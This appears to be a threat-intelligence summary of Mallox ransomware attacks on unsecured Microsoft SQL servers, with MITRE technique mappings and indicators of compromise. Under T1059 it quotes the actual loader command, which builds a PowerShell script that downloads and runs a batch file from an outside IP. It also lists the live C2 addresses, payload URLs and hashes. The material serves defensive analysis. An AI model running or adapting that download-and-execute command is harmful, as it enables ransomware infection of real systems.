Threat Research

Mallox Ransomware Strikes Unsecured MSSQL Servers

Securonix

Mallox ransomware targets unsecured Microsoft SQL Servers to gain initial access and then unleashes a complex infection chain to encrypt files and drop a ransom note. It exfiltrates data to a C2 and uses a Tor onion-based site for attacker communications while disabling system protections to maximize impact.
Read more: https://blogs.quickheal.com/mallox-ransomware-strikes-unsecured-mssql-servers/

Keypoints

  • Mallox targets unsecured Microsoft SQL Servers using brute force attempts to gain initial access.
  • Infection chain leverages tzt.bat, a .NET payload, and process hollowing to inject ransomware into system processes.
  • Files are encrypted with a .Mallox extension after deleting shadow copies and modifying boot/configuration settings.
  • The ransomware uses a ransom note named File Recovery.txt containing a Tor onion link for decryption discussions.
  • Exfiltration of targeted system information to a C2 and a public onion-based data-exposure site is described.
  • Defensive measures include whitelisting, offline backups, and Quick Heal signatures for Mallox variants.

MITRE Techniques

  • [T1059] Command and Scripting Interpreter – Used to run commands via cmd.exe and PowerShell to fetch and execute payload. “C:WINDOWSSystem32cmd.exe” /C echo $cl = New-Object System.Net.WebClient >%TEMP%updt.ps1 & echo $cl.DownloadFile(“http[:]//43[.]138[.]76[.]102/Mfhigwwvsie[.]bat”, “%TEMP%tzt.bat”) >> %TEMP%updt.ps1 & powershell -ExecutionPolicy Bypass %TEMP%updt.ps1 & WMIC process call create “%TEMP%tzt.bat””
  • [T1490] Inhibit System Recovery – Deletes shadow copies and manipulates system guards to hinder recovery. “it disables the Shutdown, Restart, and Sign-out options”
  • [T1083] File and Directory Discovery – Traverses folders and uses FindFirstFileExW to exclude whitelisted folders. “It traverses all the folders and uses API “FindFirstFileExW” to exclude the whitelisted folders.”
  • [T1082] System Information Discovery – Checks language/locale to tailor the attack. “Firstly, It checks the default language ID for the current user to exclude some countries from the targeted attack.”
  • [T1486] Data Encrypted for Impact – Encryption of files as part of the payload. “The injected payload pf the Mallox Ransomware is the main module that contains the country check, Deletion on of the shadow copy, Termination of running processes, and encryption.”
  • [T1489] Service Stop – Termination of processes and related service disruption to enable encryption. “The second thread will modify the Boot Configuration, and terminates some of the hardcoded processes.”

Indicators of Compromise

  • [IP] 43.138.76.102 – used to download malicious payload via HTTP in the initial script
  • [URL] http://43.138.76.102/Mfhigwwvsie.bat – BAT file downloaded during infection
  • [URL] https://files.catbox.moe/r6piiq.vdf – encrypted VDF payload downloaded from C2
  • [Hash] 77BFCEE98F086C8E25A69D252A6609E1 – Bat loader hash
  • [Hash] 08D4D184E6E3484E8B676FA0E0A24AFA – Loader payload hash
  • [Hash] 1B7578D04324CD6C8BF11985B79A814A – Encrypted payload hash
  • [Domain] wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhklvlrexljoyuklaad.onion – Onion-based C2/communication site
  • [File] File Recovery.txt – Ransom note filename dropped on infected hosts